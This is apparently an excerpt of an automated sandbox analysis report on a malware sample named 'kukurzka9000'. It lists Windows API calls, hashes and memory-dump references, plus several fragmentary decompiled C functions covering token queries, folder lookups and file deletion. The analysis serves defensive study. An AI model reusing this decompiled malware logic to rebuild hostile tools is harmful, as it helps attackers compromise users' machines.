                                                                                                                                                                        • Opcode ID: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
                                                                                                                                                                        • Instruction ID: a7bd2135d4ca5224a89d8d309c9e7f8941a2754b7de24c6582853fb63be23a38
                                                                                                                                                                        • Opcode Fuzzy Hash: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
                                                                                                                                                                        • Instruction Fuzzy Hash: 8841BFB0910115BEEF24ABA5CD45FBAB3B8EB44704F008569F501A72D0EBB0AE54CB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,?,iqroq5112542785672901323), ref: 0040A0D6
                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,iqroq5112542785672901323), ref: 0040A0DD
                                                                                                                                                                        • GetLastError.KERNEL32(?,iqroq5112542785672901323), ref: 0040A102
                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040A15F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CurrentErrorFreeGlobalLastOpenToken
                                                                                                                                                                        • String ID: iet$iqroq5112542785672901323
                                                                                                                                                                        • API String ID: 88979007-392904914
                                                                                                                                                                        • Opcode ID: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
                                                                                                                                                                        • Instruction ID: 15eb1b3bc6c873a00f883c6e6f8e066a9c9a871e93fd9db043f72c5c5a2fc382
                                                                                                                                                                        • Opcode Fuzzy Hash: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
                                                                                                                                                                        • Instruction Fuzzy Hash: 51118135900215FBDB119BE6DE44EAFBBB8EB48750F040475E900F61A0DB74DE24DB66
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                        			E00403F9D(void* __ecx, intOrPtr __edx, char _a4, char _a8) {
                                                                                                                                                                        				void* _t7;
                                                                                                                                                                        				void* _t16;
                                                                                                                                                                        				void* _t17;
                                                                                                                                                                        				void* _t26;
                                                                                                                                                                        				void* _t28;
                                                                                                                                                                        				void* _t30;
                                                                                                                                                                        
                                                                                                                                                                        				_t17 =  *((intOrPtr*)( *0x40e044))(0x40, 0x228, _t26, _t30, _t16, __ecx);
                                                                                                                                                                        				_t7 =  *((intOrPtr*)( *0x40e044))(0x40, 0x228);
                                                                                                                                                                        				_t28 = _t7;
                                                                                                                                                                        				 *0x40e0c4(0, _t17, 0x1c, 0);
                                                                                                                                                                        				 *0x40e0c4(0, _t28, 0x1a, 0);
                                                                                                                                                                        				_t1 =  &_a8; // 0x407b38
                                                                                                                                                                        				E00401B05(_t17,  *_t1, __edx, _a4, 0);
                                                                                                                                                                        				_t3 =  &_a8; // 0x407b38
                                                                                                                                                                        				E0040196E(_t28,  *_t3, __edx, _a4, 0);
                                                                                                                                                                        				if(_t17 != 0) {
                                                                                                                                                                        					LocalFree(_t17);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                        					LocalFree(_t28);
                                                                                                                                                                        				}
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}









                                                                                                                                                                        0x00403fbe
                                                                                                                                                                        0x00403fc3
                                                                                                                                                                        0x00403fcc
                                                                                                                                                                        0x00403fce
                                                                                                                                                                        0x00403fdb
                                                                                                                                                                        0x00403fe1
                                                                                                                                                                        0x00403fec
                                                                                                                                                                        0x00403ff1
                                                                                                                                                                        0x00403fff
                                                                                                                                                                        0x00404009
                                                                                                                                                                        0x0040400c
                                                                                                                                                                        0x0040400c
                                                                                                                                                                        0x00404014
                                                                                                                                                                        0x00404017
                                                                                                                                                                        0x00404017
                                                                                                                                                                        0x00404026

                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00407B38,00000000,00000000), ref: 00403FCE
                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,?,00407B38,00000000,00000000), ref: 00403FDB
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00407B38,00000000,00000000), ref: 0040400C
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00407B38,00000000,00000000), ref: 00404017
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FolderFreeLocalPathSpecial
                                                                                                                                                                        • String ID: 8{@$pXet
                                                                                                                                                                        • API String ID: 1111715986-2685298059
                                                                                                                                                                        • Opcode ID: faabf291c3588ec38a8ee4fb6b6ae69e583b51ce6e94b49b7ce2d95358603802
                                                                                                                                                                        • Instruction ID: 72fdba0f78f482ba83b50744195af73f567e22cf42767fcd2574695d6fb78c79
                                                                                                                                                                        • Opcode Fuzzy Hash: faabf291c3588ec38a8ee4fb6b6ae69e583b51ce6e94b49b7ce2d95358603802
                                                                                                                                                                        • Instruction Fuzzy Hash: 600128713402047BF7205F929D4AF6B3768DBC5B11F044138FB18BB2D1DAB49C1086AD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00000000), ref: 004039CB
                                                                                                                                                                          • Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 004039AA
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000000), ref: 004039BA
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00000000), ref: 004039C1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$DeleteFile
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2194112602-1731603023
                                                                                                                                                                        • Opcode ID: 0273935b1b11092318b069b65173c2f6a9546147bbdeeea3bf04ef57adf8446e
                                                                                                                                                                        • Instruction ID: 855b80ec5d303092bec4e067a8265e7fa441cfeb4fa3f9afbe0cd358cb9c57d7
                                                                                                                                                                        • Opcode Fuzzy Hash: 0273935b1b11092318b069b65173c2f6a9546147bbdeeea3bf04ef57adf8446e
                                                                                                                                                                        • Instruction Fuzzy Hash: EF718D71500210EFDB059FA6EE84A5E3BB9FB48310B104979F925F72E0DB74DA208B5A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00000000), ref: 02392F3F
                                                                                                                                                                          • Part of subcall function 02399C12: LocalFree.KERNEL32(00000000,?,?,02391F22), ref: 02399C75
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 02392F1E
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000000), ref: 02392F2E
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00000000), ref: 02392F35
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$DeleteFile
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2194112602-1731603023
                                                                                                                                                                        • Opcode ID: aa236570a63e942e95a62eeae442c9e13dcf8293740132a561ba828fd4245b9e
                                                                                                                                                                        • Instruction ID: 7a09d3072d8693827b430d191f4bace249dd0d6362230bdd5bb1da24d5378ff3
                                                                                                                                                                        • Opcode Fuzzy Hash: aa236570a63e942e95a62eeae442c9e13dcf8293740132a561ba828fd4245b9e
                                                                                                                                                                        • Instruction Fuzzy Hash: AC716031900610FFDF159FA6EE84A5E3BB9FB49310B104935F925E72A0DB749A20CF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,?,?), ref: 02390F84
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02390FA4
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 02390FC2
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,?,?), ref: 02391018
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CombinePath$CloseFindFreeLocal
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2199340046-1731603023
                                                                                                                                                                        • Opcode ID: 71846108eca0c7d647193b22d8ce5dd4fdf7bc5ca958116010044f5b0674090b
                                                                                                                                                                        • Instruction ID: a68cc286662499376067b96a30290c053ec81f603c6d1c09bf7541988f908876
                                                                                                                                                                        • Opcode Fuzzy Hash: 71846108eca0c7d647193b22d8ce5dd4fdf7bc5ca958116010044f5b0674090b
                                                                                                                                                                        • Instruction Fuzzy Hash: 72412471900325ABDF289B61CD84FEA7378EB46300F0009A8FA06B3290EB759B55CF64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,?,?), ref: 0239111D
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02391181
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 023911EE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseCombineFindFreeLocalPath
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2857355001-1731603023
                                                                                                                                                                        • Opcode ID: bc6433c40a8b9f75e8f33f0345bf4f0871bf308c0c9983f9c55045f8c74c41ce
                                                                                                                                                                        • Instruction ID: 3f83fbff904b09474abd29287691fe439f6c058994a7be10c21542012c3f75e4
                                                                                                                                                                        • Opcode Fuzzy Hash: bc6433c40a8b9f75e8f33f0345bf4f0871bf308c0c9983f9c55045f8c74c41ce
                                                                                                                                                                        • Instruction Fuzzy Hash: E6412671500219BBDF249B61DD84FEA777CEB46300F0049A4FA09B3250EB759E46CF64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,?,iqroq5112542785672901323), ref: 0239964A
                                                                                                                                                                        • GetLastError.KERNEL32(?,iqroq5112542785672901323), ref: 02399676
                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 023996D3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentErrorFreeGlobalLastProcess
                                                                                                                                                                        • String ID: iet$iqroq5112542785672901323
                                                                                                                                                                        • API String ID: 775681509-392904914
                                                                                                                                                                        • Opcode ID: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
                                                                                                                                                                        • Instruction ID: 449f200c4d43e67105a09a2bec2c7cc354052f5445fda86d9b9753ce306b97c1
                                                                                                                                                                        • Opcode Fuzzy Hash: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
                                                                                                                                                                        • Instruction Fuzzy Hash: 17116336900155FBDF11DBE6DE44FAE7BB9EB49360F000468E910F2160DB70EA24DB65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 02393542
                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 0239354F
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02393580
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0239358B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FolderFreeLocalPathSpecial
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 1111715986-1731603023
                                                                                                                                                                        • Opcode ID: 88e42fc18ceae2b43f943ef1e8e127dc7ffeae556461e89db75f0c87543971c0
                                                                                                                                                                        • Instruction ID: da2c4e87d2fabfd903863eaf81e4d5b7b47114323e465bc47d445ef94c01a831
                                                                                                                                                                        • Opcode Fuzzy Hash: 88e42fc18ceae2b43f943ef1e8e127dc7ffeae556461e89db75f0c87543971c0
                                                                                                                                                                        • Instruction Fuzzy Hash: 90012D713402147BF7205F969D4AF6B375DDBC5B10F140124FB1CAB2C0DAB09D10866D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(00001001,00000000,00000104,?,02398FC4,00000000), ref: 02398610
                                                                                                                                                                        • wsprintfW.USER32 ref: 02398621
                                                                                                                                                                          • Part of subcall function 02399A77: GlobalFree.KERNEL32(02391F22), ref: 02399AC4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02397092), ref: 02398639
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02397092), ref: 02398640
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Free$Local$DefaultGlobalUserwsprintf
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 3020363445-1731603023
                                                                                                                                                                        • Opcode ID: 6b0006650763f32028c04d1d8b65d76126bb1431ea6ad44ba0a84cd2c8da19fe
                                                                                                                                                                        • Instruction ID: c555b4a1c734d339bdb18e766458d993bf24bb5206881d420ba7a2f3818d35fb
                                                                                                                                                                        • Opcode Fuzzy Hash: 6b0006650763f32028c04d1d8b65d76126bb1431ea6ad44ba0a84cd2c8da19fe
                                                                                                                                                                        • Instruction Fuzzy Hash: AFF0C8B1200214AFF3009BA6AD89E6677ACEB48720F004435F749B7290CAB46C20866D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 52%
                                                                                                                                                                        			E0040A2AA(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                        				intOrPtr* _v20;
                                                                                                                                                                        				intOrPtr _t25;
                                                                                                                                                                        				void* _t29;
                                                                                                                                                                        				void* _t30;
                                                                                                                                                                        				void* _t39;
                                                                                                                                                                        				void* _t47;
                                                                                                                                                                        				void* _t52;
                                                                                                                                                                        				intOrPtr _t54;
                                                                                                                                                                        				void* _t70;
                                                                                                                                                                        				void* _t77;
                                                                                                                                                                        				intOrPtr* _t80;
                                                                                                                                                                        				void* _t82;
                                                                                                                                                                        				intOrPtr* _t83;
                                                                                                                                                                        				signed int _t85;
                                                                                                                                                                        
                                                                                                                                                                        				_t25 =  *0x40e1b8; // 0x658718
                                                                                                                                                                        				_v12 = _t25;
                                                                                                                                                                        				_v20 = __edx;
                                                                                                                                                                        				_v16 = __ecx;
                                                                                                                                                                        				_t29 = LocalAlloc(0x40, 0x100 +  *((intOrPtr*)( *0x40e08c))(__ecx) * 2);
                                                                                                                                                                        				_t54 = _v16;
                                                                                                                                                                        				_t52 = _t29;
                                                                                                                                                                        				_t30 = 2;
                                                                                                                                                                        				_t76 =  ==  ? _t30 : 0;
                                                                                                                                                                        				_t77 = ( ==  ? _t30 : 0) + _t54;
                                                                                                                                                                        				if(_t77 != 0) {
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t39 = LocalAlloc(0x40, 0x100 +  *((intOrPtr*)( *0x40e08c))(_t54) * 2);
                                                                                                                                                                        						_v8 = _t39;
                                                                                                                                                                        						_t82 =  *((intOrPtr*)( *0x40e18c))(_t77,  *0x40e258);
                                                                                                                                                                        						if(_t82 == 0) {
                                                                                                                                                                        							if(_a4 == 0) {
                                                                                                                                                                        								_push(_t77);
                                                                                                                                                                        								if(E0040A3E4(_t77,  &_v8, 0,  *((intOrPtr*)( *0x40e08c))()) != 0) {
                                                                                                                                                                        									_t47 = E0040A503(_t52, _v12);
                                                                                                                                                                        									_t70 = _v8;
                                                                                                                                                                        									goto L9;
                                                                                                                                                                        								}
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t47 = E0040A503(_t52, _v12);
                                                                                                                                                                        								_t70 = _a4;
                                                                                                                                                                        								L9:
                                                                                                                                                                        								_t52 = E0040A503(_t47, _t70);
                                                                                                                                                                        							}
                                                                                                                                                                        							_t83 = _v20;
                                                                                                                                                                        							 *_t83 =  *((intOrPtr*)( *0x40e13c))( *_t83, _t52);
                                                                                                                                                                        							_t77 = 0;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t85 = _t82 - _t77 >> 1;
                                                                                                                                                                        							if(E0040A3E4(_t77,  &_v8, 0, _t85) != 0) {
                                                                                                                                                                        								_t52 = E0040A503(E0040A503(_t52, _v12), _v8);
                                                                                                                                                                        							}
                                                                                                                                                                        							_t77 = _t77 + _t85 * 2 + 2;
                                                                                                                                                                        						}
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						_t54 = _v16;
                                                                                                                                                                        					} while (_t77 != 0);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t80 = _v20;
                                                                                                                                                                        				 *_t80 =  *((intOrPtr*)( *0x40e13c))( *_t80, _t52);
                                                                                                                                                                        				LocalFree(_t52);
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}




















                                                                                                                                                                        0x0040a2b0
                                                                                                                                                                        0x0040a2be
                                                                                                                                                                        0x0040a2c7
                                                                                                                                                                        0x0040a2ca
                                                                                                                                                                        0x0040a2d9
                                                                                                                                                                        0x0040a2db
                                                                                                                                                                        0x0040a2e2
                                                                                                                                                                        0x0040a2e4
                                                                                                                                                                        0x0040a2e9
                                                                                                                                                                        0x0040a2ec
                                                                                                                                                                        0x0040a2ee
                                                                                                                                                                        0x0040a2f4
                                                                                                                                                                        0x0040a30c
                                                                                                                                                                        0x0040a31b
                                                                                                                                                                        0x0040a320
                                                                                                                                                                        0x0040a324
                                                                                                                                                                        0x0040a35f
                                                                                                                                                                        0x0040a375
                                                                                                                                                                        0x0040a389
                                                                                                                                                                        0x0040a390
                                                                                                                                                                        0x0040a395
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a395
                                                                                                                                                                        0x0040a361
                                                                                                                                                                        0x0040a366
                                                                                                                                                                        0x0040a36b
                                                                                                                                                                        0x0040a398
                                                                                                                                                                        0x0040a39f
                                                                                                                                                                        0x0040a39f
                                                                                                                                                                        0x0040a3a1
                                                                                                                                                                        0x0040a3ae
                                                                                                                                                                        0x0040a3b0
                                                                                                                                                                        0x0040a326
                                                                                                                                                                        0x0040a32b
                                                                                                                                                                        0x0040a33b
                                                                                                                                                                        0x0040a351
                                                                                                                                                                        0x0040a351
                                                                                                                                                                        0x0040a356
                                                                                                                                                                        0x0040a356
                                                                                                                                                                        0x0040a3b5
                                                                                                                                                                        0x0040a3bb
                                                                                                                                                                        0x0040a3be
                                                                                                                                                                        0x0040a2f4
                                                                                                                                                                        0x0040a3c6
                                                                                                                                                                        0x0040a3d4
                                                                                                                                                                        0x0040a3d6
                                                                                                                                                                        0x0040a3e3

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000000,?), ref: 0040A2D9
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000000,?), ref: 0040A30C
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,00000000,00000000,?), ref: 0040A3B5
                                                                                                                                                                          • Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
                                                                                                                                                                          • Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040A3D6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$Alloc$lstrlen$Global
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2107727554-1731603023
                                                                                                                                                                        • Opcode ID: f075e1c407a2bf6e50d5205a2f9a31135d687d93ab644a6ad8db2f955380cc72
                                                                                                                                                                        • Instruction ID: 8d9fe808253cfd760579b52592682b105d53dbc0a4ab2c38afac3778b4664aea
                                                                                                                                                                        • Opcode Fuzzy Hash: f075e1c407a2bf6e50d5205a2f9a31135d687d93ab644a6ad8db2f955380cc72
                                                                                                                                                                        • Instruction Fuzzy Hash: 5A419572A00314EFDB14DFA5DD81AAE77B5EB88310F10497AE941B7390DBB89D20CB95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,?,?), ref: 02395950
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?), ref: 0239596A
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 02395985
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseCombineFindFreeLocalPath
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2857355001-1731603023
                                                                                                                                                                        • Opcode ID: 56b1df39dbae194d889f4e9502efc4fd47014f49f1f32aee509a4732f5f3c9b0
                                                                                                                                                                        • Instruction ID: 332ae5ce7c0d58fef10defff0a79a313ed0a2850fbbec30c307c67ddcb4ffd89
                                                                                                                                                                        • Opcode Fuzzy Hash: 56b1df39dbae194d889f4e9502efc4fd47014f49f1f32aee509a4732f5f3c9b0
                                                                                                                                                                        • Instruction Fuzzy Hash: 05312472108301AFEB25EB14DC80EBF73B9EB86324F004D2DF96593290DB31AA49CB55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • StrCpyW.SHLWAPI(?,00000000), ref: 02390D4F
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,?,?,40000001,00000000,00000000,?,?,40000001,00000000,00000000), ref: 02390D56
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,40000001,00000000,00000000,?,?,40000001,00000000,00000000), ref: 02390D61
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2826327444-1731603023
                                                                                                                                                                        • Opcode ID: af2a643a322c620d98a535cd9c71554de113ed27803ffe39f131d2213ba6c728
                                                                                                                                                                        • Instruction ID: 7a280c423c8f4239541ee10d400a42a4c11b2e9f254274a29493f52c3e4a27ac
                                                                                                                                                                        • Opcode Fuzzy Hash: af2a643a322c620d98a535cd9c71554de113ed27803ffe39f131d2213ba6c728
                                                                                                                                                                        • Instruction Fuzzy Hash: 4301DF72200115FBEB28ABAAED84FAE77ACDF49358F000421F605E6150DBB1ED10C678
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 39%
                                                                                                                                                                        			E00409265(intOrPtr* _a4) {
                                                                                                                                                                        				void* _t18;
                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                        
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_t20 = 1;
                                                                                                                                                                        				if( *((intOrPtr*)( *0x40e10c))() == 0) {
                                                                                                                                                                        					GetLastError();
                                                                                                                                                                        					_t20 =  ==  ? 0 : 1;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t18 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
                                                                                                                                                                        				_t1 = _t20 + 1; // 0x2
                                                                                                                                                                        				wsprintfW(_t18,  *0x40e2e4, _t1 << 5);
                                                                                                                                                                        				_t21 = _a4;
                                                                                                                                                                        				 *_t21 = E0040A503( *_t21, _t18);
                                                                                                                                                                        				LocalFree(_t18);
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}





                                                                                                                                                                        0x0040926f
                                                                                                                                                                        0x00409273
